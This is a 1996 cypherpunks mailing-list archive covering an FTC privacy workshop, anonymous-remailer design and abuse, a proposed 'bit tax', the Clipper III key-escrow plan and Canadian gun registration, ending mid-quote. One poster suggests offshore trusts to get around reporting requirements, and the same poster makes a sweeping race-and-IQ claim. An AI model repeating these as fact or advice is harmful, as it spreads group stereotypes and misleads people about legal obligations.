Subject: FTC online workshop on privacy
Message-ID: <01I4ZKWPMI7K8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Pointing out encryption, anonymnity, etcetera as means couldn't
hurt...
	BTW, at the end of the message is something from this Adam Starchild
fellow, with a web address for "Asset Protection & Becoming Judgement Proof."
I'd be interested in a review of it.
	-Allen

From:	IN%"rre@weber.ucsd.edu" 22-MAY-1996 01:05:58.45
From: Phil Agre <pagre@weber.ucsd.edu>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Sun, 19 May 1996 14:41:06 -0700
From: Adam Starchild <taxhaven@ix.netcom.com>
To: privacy@ftc.gov
Subject: FTC Workshop on Consumer Privacy in Cyberspace


      FEDERAL TRADE COMMISSION WORKSHOP ON CONSUMER PRIVACY
              IN CYBERSPACE TO BE HELD IN JUNE 1996

     The Federal Trade Commission's Bureau of Consumer Education
will hold a public workshop on June 4 and 5 to focus on privacy
issues in the online marketplace.  The development of technologies
such as the Internet and the World Wide Web has allowed online
businesses to collect and use personal information about consumers,
often without consumers' knowledge or consent.  The workshop
will examine consumer privacy issues in this new marketplace,
consumer and business education about the use of personal
information online, and ways to enhance the growth of the online
marketplace by fostering consumer confidence. 
     Workshop topics will include the use of consumer information,
the use of medical and financial information online, the collection
and use of information about children, electronic approaches to
protecting consumer privacy online, and the European Union's
directive on the protection of personal data.
     The workshop will be open to the public and will be held on
June 4, 1996 from 9:00AM to 5:00PM in Room 432 of the FTC
headquarters building, 6th Street and Pennsylvania Avenue, N.W., in
Washington, D.C.  On June 5, 1996 the workshop will be held from
9:00AM to 12:30PM in Room 332 of the FTC headquarters building.  
     The Bureau invites representatives of consumer groups,
industry, government agencies, and other groups to take part in the
workshop.  Any person wishing to be considered for participation in
the public workshop must file a written request, on or before May
24, 1996, to Martha Landesberg, Division of Credit Practices,
Bureau of Consumer Protection, Federal Trade Commission,
Washington, DC 20580.


Posted by Adam Starchild
     Asset Protection & Becoming Judgement Proof at
     http://www.catalog.com/corner/taxhaven



The privacy list is run automatically by the Majordomo list manager.
Send a "help" command to majordomo@ftc.gov for assistance.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 18:10:47 +0800
To: unicorn@schloss.li
Subject: Re: Toastmasters?
Message-ID: <01I4ZL1QWZX08Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 20-MAY-1996 22:30:15.23

>Ask every state which has such reporting requirements (which is every
>state in the union).

>If you wanted to form an offshore corporation you'd have to form an
>exempted one.

	IIRC, there was some discussion of some form of blind trusts a bit
back... it was used under English common law to enable stuff before the
actual invention of corporations. The ownership of the stock of such an
offshore company by one or more such trusts might get around such problems,
especially if the trusts had those (very interesting) flight provisions I
believe you mentioned a bit back.

>That would clearly change the analysis.

	RE: making a profit. Well, yes, it is a pretty good argument that
you aren't just going for lack of liability, since that's part of what
corporations are _for_...
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 18:14:44 +0800
To: markm@voicenet.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <01I4ZLADUW968Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"markm@voicenet.com"  "Mark M." 21-MAY-1996 02:41:22.53

>One problem I see with this is that if even one remailer operated using the
>block lists instead of permit lists, then every other remailer in the chain
>could hypothetically be held accountable for the contents of the message.
>This idea of permit lists makes sense, but I am not sure it would really solve
>anything.

	Well, that would depend on the traffic analysis defeating features
not working right. Admittedly, for the next-to-last or so remailer, they
may not work well enough anyway... but proof beyond a reasonable doubt would
be difficult. Civil suits unfortunately don't follow that standard (even for
the punishment done through punitive damages), but they do require some proof.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Wed, 22 May 1996 05:38:59 +0800
To: qut@netcom.com
Subject: Re: CAPITALISTS' SUCK
In-Reply-To: <199605211245.IAA24492@unix.asb.com>
Message-ID: <199605211519.BAA11670@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> On 20 May 96 at 4:07, Dave Harman wrote:
> 
> [..]
> > ! >Dave Harman writes:
> > ! >
> > ! > CAPITALISTS' SUCK
> > ! 
> > ! What witty social commentary.
> > 
> > Information wants to be free.
> 
> Information doesn't want to be free (or anything else) anymore than 
> the stapler on my desk wants to be free.
> 
> The day that abstract qualities like "information" or "color" have 
> desires would be an interesting day indeed.

Nonsense. Mathematics wants to be rational. Symmetry wants to be
self-similar. Memes want to be free.

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 16:59:30 +0800
To: llurch@networking.stanford.edu
Subject: Re: An alternative to remailer shutdowns
Message-ID: <01I4ZLEKOSPG8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"llurch@networking.stanford.edu"  "Rich Graves" 21-MAY-1996 03:48:35.01

>I certainly think that limiting newsgroup posting would be prudent. It's
>inexcusable that it's possible to use anonymous remailers to post
>*forgeries* (see the smoking flames cross-posted to alt.syntax.tactical). 

	Hmm? Aside from the very basic "forgery" of adding someone else's name
to a post (which only the veriest idiot will pay attention to, especially if
the remailer operator adds adequate warning labels outside the headers), what
forgeries are possible?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 19:22:28 +0800
To: tcmay@got.net
Subject: Re: Senator, your public key please?
Message-ID: <01I4ZLQFIGAM8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 21-MAY-1996 04:37:46.63

>(ObCaveat: I personally think a free society cannot/should not outlaw
>discrimination in any form, save that by government.)

	Agreed.

>By the way, this issue has some echoes of another technogical issue: the
>use of neural nets for loan approval software. Turns out that when a bunch
>of things are entered into a NN loan package, including the all-important
>default rate, the applicant's age, income, race, sex, education, employment
					    ^^^^
>history, credit history, etc., that NN loan packages "end up" rejecting
>many black applicants, more so than white or Asian applicants. (The NN
>"concluded" that blacks were higher risks for default than whites/Asians.)

>Even if no human being ever entered his or her biases and prejudices, the
>NN spit out this result.

>I recall there being talk about requiring "equality of outcomes," and that
>such NNs might have to have deliberately-biased inputs fed in, but I don't
>know what ever happened to this issue.

	The obvious solution in the above case is not to feed in the race
information for governmental decision-making. I recall a similar issue when
NN's were used for college admissions... while they didn't feed in the
applicant's race, they did feed in the applicant's name, and the length of it
turned out to have some correlations. (Why they were feeding in the name in
the first place is another question entirely, although NN's and GA's tend to
work the best when you don't understand the system at hand - which also tends
to mean that you shouldn't try to interpret what information is necessary.)

>In any case, I think this sort of issue, and the semi-related issue of
>"discrimination via key signatures," to be likely important issues in the
>courts in the coming years.

	It's related to that of the outlawing of IQ testing because of (I'd
say for environmental reasons) blacks having lower IQ scores on average. The
civil rights crowd are arguing for the PC egalitarian viewpoint that everyone
_should_ be the exact same in capabilities (for some absurd view of
"fairness"), and so want people treated the exact same despite obvious
differences and the validity of such tests.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Wed, 22 May 1996 19:15:40 +0800
To: cypherpunks@toad.com
Subject: Cutting down remailer abuse [ Was Re: An alternative ... ]
In-Reply-To: <Pine.A32.3.93.960521183731.12238A-100000@seminole.gate.net>
Message-ID: <9605220533.AA14419@outland.ain_dev>
MIME-Version: 1.0
Content-Type: text/plain


> One idea that came up a while back was a sort of limited tracking of mail
> -- an example would be keeping a hash of the email address where mail was
> received from for 48 hours, with the hash value being attached to the
> peice of mail as a header.
> 
> This would accomplish two things: We could source block an address without
> knowing the source; and if push came to shove an address could be
> backtracked to its original source, provided a complaint was made in time,
> and that the Bad Guy sent another mail from the same address. I think
> that legally there would be a good argument that the remailer ops had made
> a reasonable attempt and holding lawbreakers accountable, while still
> preserving the anonymity of non-abusers.

	This would have two problems (I think :):

1) How do you tell that the source address isn't a remailer?  If
things go to the disposeable remailer heads (Aren't those bad for the
environment or something? :), you might wind up blocking part of the
remailer chain.

2) Depending on the strength the hash function, there's a trail that
you submitted traffic into the remailer network for that 48 hours.
Not that sendmail/packet sniffing wouldn't show the same thing w/o IP
layer encryption . . . .

	Now if there was a DC net you could submit traffic/noise into
that would deliver into the remailer net . . . .

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 18:46:22 +0800
To: tcmay@got.net
Subject: Re:  An alternative to remailer shutdowns (fwd)
Message-ID: <01I4ZLWBOJD08Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 21-MAY-1996 05:18:04.13

>This is one reason we often talk about the dangers of remailers looking at
>what flows through their systems. Not so much to establish "common carrier"
>status, especially as that kind of status is just not something one sets
>out to establish!, but because the protection of being ignorant gets tossed
>out as soon as one admits to screening, or editing.

	Exactly how little can a remailer log and still keep adequate
functionality? I may be setting up one or two Mixmaster-type
to-other-remailers-only remailers sometime this summer (with one at Lance
Cottrell's company so I can get his help easier...), so it is a practical
question.... and one the answer to which may depend on whether one is
remailing to another remailer, or to a public setting, or to an email
address, or from an email address, etcetera.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 22 May 1996 17:28:56 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <9605220544.AA08574@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 21 May 96 at 19:43, Bad Message trolled:

> ! Theses peoples refuse to register their guns, although it is
> ! mandatory in canada (to be registered within 7(?) years...)
> 
> There has been total firearm registration since 1968.

Absolute BS.  Since the late seventies, the mandatory registration
of all firearms purchased is in effect and you must hold a valid (in
french) A.A.A.F.   But you did not have to report firearms you
already owned.  But with our new law, you *have* to register them
within 7 years.  And apparently, you have to show proof of ownership 
of a registered firearm to buy ammunitions.  But I must read about 
this aspect a little more...

jfa


 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants;  physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 I reserve the right to post publicly any private e-mail sent to me.
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 19:51:44 +0800
To: tcmay@got.net
Subject: Re: Long-Lived Remailers
Message-ID: <01I4ZMFV9HH88Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 21-MAY-1996 05:37:17.56

>At 4:56 PM 5/20/96, Rev. Mark Grant, ULC wrote:
>>With regard to the problems of remailers being shut down when we want
>>long-lived addresses, wouldn't seperating the input and output be one
>>possibility? That is (like Hal's Alumni remailer) you'd send mail to
>>'remailer@anon.ai' and it would be forwarded via a disposable account
>>elsewhere. All messages would appear to come from 'disposable@foo.com' and
>>if that account was shut down a new one could be opened to replace it
>>while incoming mail simply backed up at the main remailer account.

>This is a very good idea.

	Agreed.

>Traffic analysis will be quite easy to do, of course, as all mail sent to
>the persistent address comes out of the "disposable@foo.com" address.
>Q.E.D.

	As has been pointed out since your message, one could logically have
multiple remailers all using the same output account for messages. Extensions
on this idea would be having them use it only for ones going to other than
another remailer, to prevent the traffic from being noticed (if lots of
traffic to remailers is coming out of one account, someone's going to
notice...). Several people could run such output accounts, sending encrypted
data on how to access the latest one(s) to (a subset of) remailer operators.
(I say a subset in order to stop the NSA from running a remailer and letting,
say, AOL know about each new output account on AOL. If some remailer or
group of remailers wasn't told about a new output account, and the output
account lasted statistically significantly longer (controlling for level of
output), then that'd be cause for suspicion.) Which one was used for any
given message through a particular remailer could be randomly chosen from
those that remailer knew.
	Another aspect of this is that it would spread out the cost of
operating the output account. One way to deal with this would be to have
the postage going to the output account owner instead of to the remailer, or
two items of postage (one to the remailer, one to the output account owner), or
three items of postage (one to the first remailer in the chain, one to the
last, and one to the output account).

>(Hal, to use him as the example, could start using his own choice of
>remailer hops to accomplish much the same result. We've talked about this
>for a long time, too. If I ran a remailer, I think I'd route *all* traffic
>leaving my site through at least one other remailer...kind of a "hot
>potato" effect. Of course, if _everyone_ did this, an infinite loop would
result. Lots of interesting twists, though, as messages could be set to
"leak out" of the loops.)

	Oh? What's this idea?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 20:57:49 +0800
To: cypherpunks@toad.com
Subject: Bit tax proposal?
Message-ID: <01I4ZMQQODUA8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu" 22-MAY-1996 01:51:18.54
From: Phil Agre <pagre@weber.ucsd.edu>

This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Sat, 11 May 1996 16:59:22 -0400 (EDT)
From: Arthur Cordell <acordell@clark.dgim.doc.ca>

   
              SCENARIOS FOR THE FUTURE: WORK AND EDUCATION


The First of Four Sessions Leading to the World Leadership Conference

                      "New Taxes for a New Economy"


                           September 14, 1995


                       Victoria University, in the
                          University of Toronto


                                       Arthur J. Cordell
                                       Special Advisor
                                       Information Technology Policy
                                       Department of Industry       
                                       Ottawa*




*The views expressed are those of the author alone and are not
necessarily those of any department or agency of government.

========================


     It's a pleasure to be part of the panel this evening.  Ran told us
about the problematique and Sally told us about one way to re-engage
people with the economy and society in general.  I am proposing one
way to get at the productivity of the new economy so that income can be
distributed to those who are no longer working.

     My talk is "New Taxes For A New Economy."  Many of the ideas
expressed by me this evening first appeared in a paper that Ran Ide and
I co-authored for a meeting of the Club of Rome last year.  Called The
New Wealth of Nations,the paper dealt with ways of getting at the
productivity of information technologies.  Creating a new source of
revenues that can be used in a variety of ways, including re-distribution
as income.
     
     First a bit of history.  As you all know in the not too distant past--
before 1900--most people worked in agriculture.  When automation of
one sort or another took place, people moved off the land to the new
jobs opening up in manufacturing.  Over the next decades automation of
one sort or another took place and people moved to the new jobs
opening up in the service sector.  Now that the service sector is itself
being automated, it is not clear where workers go.  Where do people find
work in an increasingly automated world?

     My view is that information technology is like no other.  It is
energy saving, capital saving and labour saving.  It is also distance
insensitive.  It can replace people in a great number of functions. 
Remembering, deciding, judging, estimating, counting, etc., can all be
done by information technologies, and can be done better, faster and
cheaper than by people.

     So I  think that we are going into a time of innovation and greatly
increased productivity throughout the economy.  Jobs will grow, but at a
much slower rate.  A short-hand way of saying this is that we'll be
seeing 'jobless growth.'

     Rather than seeing this as a disaster, I prefer to see it as an
opportunity.  After all the industrial revolution--the development of
steam power, electricity, the internal combustion engine--was all about
eliminating work, not creating work.  The industrial revolution was
about releasing people from dangerous, hard and mind-numbing work.

     You know in the 'old days' a job was a means to an end because
that is how people got income.  In the past few decades job creation has
become an end in itself because this is how income can be distributed. 
While there are many important social and psychological benefits in
having a job---job creation can be a very costly way to distribute income. 

     So in the debate and discussion about the future of work my
position is that the issue is income, not jobs.  

     In my view we need to get consensus on a positive vision of the
New Economy.  One possible positive vision is that the New Economy
will be one where few people work in traditional ways.  It will be an
economy that is VERY infotech intensive and highly productive--but the
new wealth created by the productivity is distributed as income in new
and novel ways.  Anything wrong with aiming toward this sort of
outcome?

     But how do we get income to people who are no longer working in
the traditional areas of society?

     I think that we have to go back and take a closer look at the tax
system.  If everything else is changing with information technologies and
the New Economy, I think the tax system itself deserves a closer look.

     Today in Canada we are wringing our hands at the lack of tax
revenues.  Some of the tax concerns pre-date the 'new economy' and
carry over from the recent past: tax breaks to small business; a growing
underground economy based on cash; transnational companies who
'transfer price' in ways so that profits are declared in low tax areas of the
world; the rise of tax havens.

     The tax base is also threatened by the labour displacing capacity of
new technologies.  More and more services are the result of people
interacting with computer-based interfaces including touch-tone phones
connected to digital networks.  As do it yourself banking, shopping,
libraries, etc., take hold, the number of people displaced increases. 
Although this adds to the over-all productivity of the system, the
workers who lose jobs no longer pay taxes, rather they make demands
on the system for income support of one kind or another.  

     What happens to the productivity gains created by digital
networks?  Some gains show up in profits, some show up in lowered
prices, some goes to domestic labour and some to domestic capital--some
is 'lost' in the networks. In some cases off-shore capital benefits from
productivity advances.

     While part of the increased productivity may show up in earnings
to firms adopting the technology, to banks, to telecom firms or other
network operators, it appears that some of the productivity gains just
disappear.  It is either a non-monetary item (eg., time saved in using
ATMs for banking) or the productivity is diffused over so many
domestic and foreign players that it is not appropriated effectively, if at
all.  

     The challenge is to access the new productivity.  There is a strong
case to be made that government has not fully accessed the new wealth. 
That government has not yet realized where and how wealth creation is
taking place.  That government has not yet figured out a way to tax and
re-distribute some of the new wealth created by global digital networks. 

     By viewing the new economy through the prism and mindset of
the old economy we are unable to see just how wealthy and productive
the economy has truly become. Outdated ways of looking at the
economy have led us to neglect the new wealth.  We are neglecting the
new productive capacity created by and carried on global networks. 
Digital networks that provide so much of the new wealth also provide a
way for us, through our governments, to get at some of the productive
potential of a knowledge-based economy.  

     Over two hundred years ago Adam Smith wrote about the Wealth
of Nations.  He concluded that wealth was based on the division of
labour and the extent of the market.  Today we can add something else
to society's production function: knowledge, information and
communications.  

     The new wealth of nations is to be found in the trillions of digital
bits of information pulsing through global networks.  These are the
physical/electronic manifestation of the many transactions, conversations,
voice and video messages and programs that, taken together record the
process of production, distribution and consumption in the new
economy.  

     Digital flows are the new element of production whether in the
form of entertainment such as movies and video games; or, in the form
of financial management such as electronic commerce for business and
automatic tellers for the average citizen; or, in systems designed to
control aircraft traffic in the skies and baggage distribution on the
ground below; or, in managing the maze of telephone calls, faxes, e-mail
and charge card accounts that characterize life in this latter part of the
twentieth century.

     The suggested new tax is a turnover tax on interactive digital traffic. 
This new tax would be similar to a gasoline tax or paying a toll on a
bridge or toll road or having a license plate on a car.  These current
excise and indirect taxes apply by weight of truck, by amount of gas
used, not on the value of the commodity carried by the truck. Moving
from the old highway to the metaphor of the new highway,  my
proposal is to tax the digital traffic on the Information Highway.  

     Proposed is an easily administered tax on each digital bit of
information.  A 'bit tax.'  Whether the digital bit is part of a foreign
exchange transaction, a business teleconference, an Internet e-mail or file
transfer, electronic check clearance or an ATM transaction, each bit is a
physical manifestation of the new economy at work.  Whether the tax is
levied on the traffic carried by a fibre optic cable or on micro-wave or
whether the tax is levied on interactive satellite traffic, the bit tax
presents a way of accessing the  new wealth being created by the New
Economy.  
 
     The bit tax would be applied to value added interactive digital
transactions.  Interactivity makes the transaction valuable.  A broadcast
message may or may not add value, that is if it is heard.  An interactive
transaction: a conversation, data search, accessing an ATM--is an activity
you choose to do because it does something for you.  You get something
for doing it, you get something out of doing it:  otherwise you wouldn't
be do doing it.   It is this new value, this new productivity that is
creating so much new wealth in networks.

     All interactive digital information would be subject to the new tax. 
Thus digital broadcast and digital radio (all 'one to many' broadcasts)
would be exempted from the tax.  Digital broadcasts of one to few eg.,
TV broadcast to a few stations for later rebroadcast, or newspaper
transmission by satellite to remote printing plants are interactive (because
they are 'addressable') and would be subject to the bit tax.

     The bit tax would not be a user pay tax.  Increased use by a region
would however result in higher bit taxes.  So without getting into too
complex a discussion, one could imagine that at the local level an
average of digital traffic would be measured by designated region (this
could be by area code, metro area, province or state, or nation). This
statistical average would provide the basis for the bit tax rate at the
designated local level.  Leased lines would pay some percentage of the
carrying capacity of the line while long distance public lines would be
metered by usage patterns.

      To summarize: the implementation of the tax would fit into three
broad categories:

        1.    Long-distance lines (general public), a tax directly
              proportional to digital flows between major long-distance
              nodes in the country.

        2.    Leased lines (private lines), a fixed rate dependent on the
              bit-carrying capacity of the line.

        3.    Local Traffic, a variable rated based on a statistical average
              of gross information flows captured at each local switch
              using software already in place.

        The bit tax will be transparent.  It will be something metered
'out there' and remitted to governments.  It will vary with the collective
usage of networks.  Use of the system by any one individual will not
affect the amount of taxes being collected.  So it won't be a user-pay tax. 

     At what rate should nations tax digital bits?  How would the new
taxes be collected?  For sake of argument, the bit tax could be .000001
cents per bit.  Automatically collected it would cause fewer collection
problems than most other direct or indirect taxes. Collected by the
telecom carriers, satellite networks and cable systems the revenues would
flow directly to the national revenue service of the respective country.  

        Much work has to be done on the burden or incidence of this
new tax.  Is the tax progressive or regressive?  Will it be absorbed by the
carriers or will it be passed on to consumers?  Can one nation enact a bit
tax or does it have to a collaborative venture?  Perhaps through the
OECD or the G-7 group of nations.  And what about the tax rate itself? 
Is it too high or not high enough?  If the tax of .000001 cents per bit
yields too much revenue, then it can always be adjusted.  

        The 'bit tax' is one way to begin to deal with the dilemma of
increasing productivity and declining employment.  It represents a new
tax base that is at the heart of the new economy.  It is also a new tax
base that is growing.  It is a tax base that can be easily identified, one
where collection is in few hands.  In the New Economy it would be a tax
that is difficult to avoid.

        At a European Community meeting last year, the US
Ambassador to the US mission, Stuart Eizenstat, said the issues
surrounding the quality and quantity of available jobs in the New
Economy will not be solved by a conference here or a workshop there. 
He noted that we are facing a major change in our economies. The
change will not be easy or smooth: just as the cold war took many years
to resolve peacefully, so too will the transition to the new economy take
years of discussion, dialogue and new methods of conflict resolution.
   
        So the bit tax itself is just a modest beginning.  We need to go
further: to re-think the notion of employment as a method of income
distribution; to re-think the quest for ever more energy-intensive
economic growth in a time of environmental limits.  We need to re-think
much of our economic theory.

        But as a modest beginning, the bit tax is one way for all of
society to profit and benefit from the development of new technology. 
The bit tax can help provide the new fiscal framework to distribute the
productivity of the new economy as income when the job link is
disconnected...When Jobless Growth becomes the rule.

        Thank-you for your attention. I look forward to your questions,
comments and discussion.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 22 May 1996 21:38:50 +0800
To: cypherpunks@toad.com
Subject: Clipper III analysis
Message-ID: <199605220903.CAA09525@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I just read over the Clipper-III paper.  Here's the main scoop.  The
Government is trying to force key escrow on the world by incorporating
it into key certification systems.

They are playing on public ignorance of key certification, and are
trying in some cases to deliberately mislead people into thinking that
key certification and key escrow are the same thing.

Key certification is a way for a third party to declare that a
particular public key "belongs to" a particular identity.  E.g. that
key 85197FB5 really belongs to John Gilmore.  In PGP, people who know
you can "sign" your key to make this declaration.  Then, anyone who
trusts those people will know that your key is really yours.  When
they encrypt mail with public key 85197FB5, they can believe that
only John Gilmore can read it.

Key certification NEVER involves giving anyone a copy of your
*private* key.  Your private key is, and always should be, private to
yourself and nobody else.

Key escrow is a way for governments to get access to your private key
and read your private communications whenever they don't like what you
are doing or saying.  Or for any other reason.  So far, the only
government that is really pushing for this is the US government.
Their published policies for when they will access your key are
disturbingly non-specific.  I believe this is to cover for access by
the spy agencies such as NSA, which the public would not sanction if
it knew their current policies.

Even if the published policy for accessing your escrowed keys required
that a judge issue a warrant based on probable cause to believe a
crime has been committed -- which it doesn't -- that provides no
protection from a government that feels free to make any harmless act
into a crime.  As in the Soviet Union, lofty principles can be written
into the legal documents, but somehow citizens end up without
enforceable rights anyway.  I don't want to see my country go this
route, though it's obviously 80% of the way there already.

Because large-scale key certification systems will to some degree
involve centralization, they provide pressure points where the
government can try to force people to do bad things.  (One thing that
has kept the Internet free is that there was no central place to sue,
arrest, threaten, or otherwise terrorize into submission.)  In this
case, the bad thing they'll try to force is that the central
certification authorities will refuse to certify your key as yours,
even though they know it's yours, unless you first give the government
a copy of your private key.

Foreign relations are important to this policy, since if a significant
number of countries don't adopt this model then it won't work.  (Those
countries will build good crypto and export it, and it will leak out
around the world because of the worldwide demand for real privacy.)
The US is working hard in the OECD, the European Community, and in
one-on-one discussions with other governments, to convince them all to
impose key escrow on their citizens.

That's the scenario laid out by the Clipper-III paper.  It's a pretty
good strategy on their part.  Our job is to make it come out some
other way.

	John Gilmore

PS:  The whole paper is at http://www.eff.org/pub/Privacy/Key_escrow/
Clipper_III/960520_nist_clipper3_paper.draft.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 18:42:10 +0800
To: adam@lighthouse.homeport.org
Subject: Re: The Crisis with Remailers
Message-ID: <01I4ZN90KWLQ8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"adam@lighthouse.homeport.org"  "Adam Shostack" 21-MAY-1996 15:23:24.24

>Lance Cottrell wrote:

	Oops, I just misremembered your name. Sorry.

>| 
>| An interesting problem with anonymous postage is that it is likely to kill
>| cover traffic generators.
>| 

>Postage is most needed at the point of delivery.

>That is the node that will be taking the heat/paying the lawyers.  I'd
>operate a remailer if I was never the last node, becuase I don't have
>a site that can take the heat/seizure of machines for me.  If we pay
>those final nodes to do more, than intermediate nodes can still carry
>cover traffic for free.

	One difficulty with this on cover traffic is that one use of it is
to send to dummy addresses, with mail that looks PGP encrypted but is actually
garbage. Perhaps mail received without postage should be replaced with
garbage by the remailer, then sent to a dummy address chosen by the remailer?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 17:46:57 +0800
To: tcmay@got.net
Subject: Re: Hiding remailers behind nymservers...? (fwd)
Message-ID: <01I4ZND2NC7O8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 21-MAY-1996 15:27:09.74

>Now it may be that operating a remailer may be interpreted by some courts
>as being a "public nuisance," a theory I credit to Brad Templeton, but this
>has not yet come even close to happening.

	Interesting. Let me guess, on the copyright grounds? Kinko's and
library copy machines appear to do fine with warning labels; some equivalent
should be possible.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 18:25:51 +0800
To: droelke@rdxsunhost.aud.alcatel.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <01I4ZNUW8BCQ8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"droelke@rdxsunhost.aud.alcatel.com" 21-MAY-1996 22:04:32.30

>Heaven forbid that I use spammers as an idea base, but
>to borrow something from them.... Set up the headers
>on an anonymous message such that a Reply would result in
>the user automatically being placed on the "deny" list.
 
	Automatically placing someone on the deny list from an email to
an address added to the _body_ would be a good thing, in this context, although
would mean having to have more than one email address for the remailer.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 22 May 1996 22:31:50 +0800
To: snow <cypherpunks@toad.com
Subject: Re: TCM: mafia as a paradigm for cyberspace
Message-ID: <199605220934.CAA29479@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:55 PM 5/21/96 -0500, snow wrote:
>On Mon, 20 May 1996, Vladimir Z. Nuri wrote:
>
>> the assassination politics is quite Hitleresque at its root.
>> "kill our enemies, and everything will be better. it is our enemies
>> that are the root of all evil in the world. extinguish them, and
